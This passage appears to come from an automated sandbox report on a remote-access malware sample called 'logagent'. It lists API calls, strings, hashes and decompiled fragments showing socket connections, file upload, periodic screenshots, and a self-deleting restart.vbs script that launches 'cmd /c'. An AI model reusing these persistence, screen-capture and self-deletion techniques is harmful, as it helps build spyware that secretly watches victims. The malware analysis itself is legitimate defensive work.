                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                  • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                  • API String ID: 2510920776-3166941866
                                  • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                  • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004089A6 Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                  • _wgetenv.MSVCRT ref: 00408A1B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                  • exit.MSVCRT ref: 00408B3D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                  • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                  • API String ID: 864010295-1332127163
                                  • Opcode ID: 15269cf6162d4acb015cf3b22ae6787d784795f5e1225b26d6d716e11b425a87
                                  • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                  • Opcode Fuzzy Hash: 15269cf6162d4acb015cf3b22ae6787d784795f5e1225b26d6d716e11b425a87
                                  • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F5F4 Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 265COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                  • _itoa.MSVCRT ref: 0040F75C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 00402118: CreateThread.KERNEL32 ref: 0040212D
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                    • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                  • String ID: image/jpeg
                                  • API String ID: 1042780377-3785015651
                                  • Opcode ID: 1d0f8d6bda50375055f149ac91595ac81ba6f40a75dddab217261ebb9b9087b2
                                  • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                  • Opcode Fuzzy Hash: 1d0f8d6bda50375055f149ac91595ac81ba6f40a75dddab217261ebb9b9087b2
                                  • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410B1B Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 187sleeptimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00410B20
                                  • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                  • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                  • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                  • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                    • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                    • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                    • Part of subcall function 0041093F: SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                    • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                    • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                    • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                  • atoi.MSVCRT ref: 00410DA2
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                  • atoi.MSVCRT ref: 00410DD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@CreateSleepatoi$?length@?$basic_string@D@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimeswprintf
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                  • API String ID: 2994672083-3790400642
                                  • Opcode ID: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                  • Opcode Fuzzy Hash: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410F04 Relevance: 54.4, APIs: 36, Instructions: 407COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 21%
                                  			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
				char _v20;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				char _v168;
				char _v184;
				char _v200;
				char _v216;
				void* _t69;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				char* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				char* _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				char* _t101;
				void* _t103;
				void* _t104;
				void* _t106;
				char* _t110;
				void* _t112;
				char* _t118;
				char* _t119;
				char* _t120;
				intOrPtr* _t123;
				void* _t125;
				void* _t127;
				char* _t130;
				char* _t135;
				char* _t136;
				char* _t137;
				intOrPtr _t139;
				void* _t230;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t241;
				void* _t242;
				void* _t247;
				void* _t248;
				void* _t253;
				void* _t254;
				void* _t264;
				void* _t265;

				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_t139 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
